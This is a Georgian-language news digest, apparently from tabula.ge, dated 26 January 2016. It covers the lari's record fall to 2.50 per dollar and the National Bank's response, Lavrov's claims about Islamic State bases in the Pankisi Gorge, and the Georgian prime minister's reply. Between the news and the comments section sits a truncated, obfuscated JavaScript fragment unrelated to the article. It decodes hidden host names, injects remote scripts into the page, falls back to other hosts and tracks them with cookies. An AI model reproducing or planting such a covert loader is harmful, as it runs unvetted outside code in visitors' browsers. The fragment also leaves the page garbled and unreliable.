ფოკუსი

26 იანვარი, 2016

- იანვარს დოლართან მიმართებით ლარის გაუფასურებამ რეკორდულ ნიშნულს მიაღწია, ერთი ამერიკული დოლარის ღირებულება 2.50 ლარი გახდა. ლარის არსებობის ისტორიაში ბოლო რეკორდი 25 იანვარს დამყარდა, როდესაც ერთი დოლარის ღირებულება 2.49 ლარი იყო.
ლარი დღესვე ევროს მიმართაც გაუფასურდა, ახალი ოფიციალური კურსით, ერთი ევრო 2.7 ლარი ღირს.
ეროვნული ბანკის პრეზიდენტის გიორგი ქადაგიძის თქმით, კურსი 2.4-იან ნიშნულზე უახლოეს მომავალში უნდა დასტაბილურდეს. შემდგომი გაუფასურების შემთხვევაში კი ეროვნული ბანკი არც მონეტარული პოლიტიკის გამკაცრებას გამორიცხავს.
ეროვნულმა ბანკმა დღესვე სავალუტო რეზერვებიდან $20 მილიონი დოლარი დახარჯა.
- რაც შეეხება რუსეთ-საქართველოს შორის უვიზო რეჟიმის აღდგენას, ლავროვის თქმით, მოსკოვი მომავალში მზად არის უვიზო რეჟიმზე წამოვიდეს, თუმცა ამაზე მსჯელობა უცნაური ჩანს, რადგან ქვეყნებს შორის დიპლომატიური ურთიერთობა ამ დრომდე გაწყვეტილია. ლავროვისვე თქმით, რუსეთ-საქართველოს ურთიერთობა გაყინვის სტადიიდან გამოდის.რუსეთის საგარეო საქმეთა მინისტრის თქმით, მოსკოვს აქვს ინფორმაცია, რომ ე.წ. ისლამურ სახელმწიფოს პანკისში საწვრთნელი ბაზები აქვს - სერგეი ლავროვმა ამის შესახევ ყოველწლიურ შემაჯამებელ პრესკონფერენციაზე ისაუბრა. მისივე მტკიცებით, სწორედ ხეობაში არსებული ვითარება იყო რუსეთ-საქართველოს შორის სავიზო რეჟიმის დაწესების ერთ-ერთი მიზეზი.

- რუსეთის საგარეო საქმეთა მინისტრს დღესვე თბილისში გამოეხმაურნენ. საქართველოს პრემიერმინისტრის თქმით, არანაირი ტერორისტული რისკი დღესდღეობით პანკისის ხეობიდან არ მომდინარეობს. პრემიერი ასევე აღნიშნავს, რომ რუსეთთან დიალოგი აუცილებელია ყველა შემთხვევაში და დიპლომატიური ურთიერთობების აღდგენას მნიშვნელოვანი წინაპირობები აქვს. მისივე თქმით, ვიზების შემსუბუქება ძალზედ პოზიტიური გადაწყვეტილება იყო.
რაც შეეხება ლავროვის შეხსენებას იმის თაობაზე, რომ რუსეთის პრეზიდენტი მზადაა, ქართველ კოლეგას შეხვდეს, გიორგი მარგველაშვილი ჯერჯერობით ამ საკითზე კომენტარს არ აკეთებს.

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]]]> //-->

კომენტარები